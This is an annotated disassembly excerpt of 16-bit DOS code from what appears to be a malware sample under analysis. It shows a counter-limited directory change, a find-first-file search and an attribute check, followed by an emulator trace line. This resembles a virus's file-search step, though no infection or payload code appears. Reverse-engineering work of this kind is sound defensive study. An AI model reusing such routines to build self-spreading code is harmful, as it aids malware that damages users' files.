; DL=hundredths, at [bp + 0x13c].
; bp is loaded outside this excerpt; every data reference here is bp-relative,
; so it presumably holds the base of the sample's own data area.
; Visible behaviour: an optional directory change guarded by a counter, then a
; Find first file search whose hit is probed with Get file attributes.
0x12c13: jmp 0x12c31                          ; skip the directory-change path, go straight to the search
0x12c15: mov ah, 0x3b                         ; INT 21h AH=3Bh: set current directory (entry point not visible here)
0x12c17: lea dx, word ptr [bp + 0x394]        ; DS:DX -> path string at bp+0x394 (contents not shown)
0x12c1b: int 0x21
0x12c1d: mov al, byte ptr ds:[bp + 0x397]     ; al = counter byte at bp+0x397
0x12c22: cmp byte ptr ds:[bp + 0x397], 3      ; counter already at 3?
0x12c28: je 0x12c88                           ; yes: leave this path (target outside the excerpt)
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al     ; store counter + 1; presumably counts directory changes -- TODO confirm
0x12c31: mov ax, 0x4e00                       ; INT 21h AH=4Eh: find first matching file
0x12c34: mov cx, 0                            ; attribute mask 0 = normal files only
0x12c37: lea dx, word ptr [bp + 0x253]        ; DS:DX -> search pattern at bp+0x253 (contents not shown)
0x12c3b: int 0x21                             ; logged in the trace as "Find first file" (op 78 = 0x4E)
0x12c3d: jae 0x12c42                          ; CF clear = a file was found
0x12c3f: jmp 0x12d45                          ; CF set = no match; handler is outside the excerpt
0x12c42: push 0x4300                          ; ax = 0x4300 via push/pop: INT 21h AH=43h AL=00h, get file attributes
0x12c45: pop ax
0x12c46: mov dx, 0x9e                         ; DS:009Eh = name field of the default DTA (PSP:80h + 1Eh), assuming DS is the PSP segment and the DTA was not moved
0x12c49: int 0x21
2018-12-25T12:36:12.175747391Z 78 PC: 12c3d | Find first file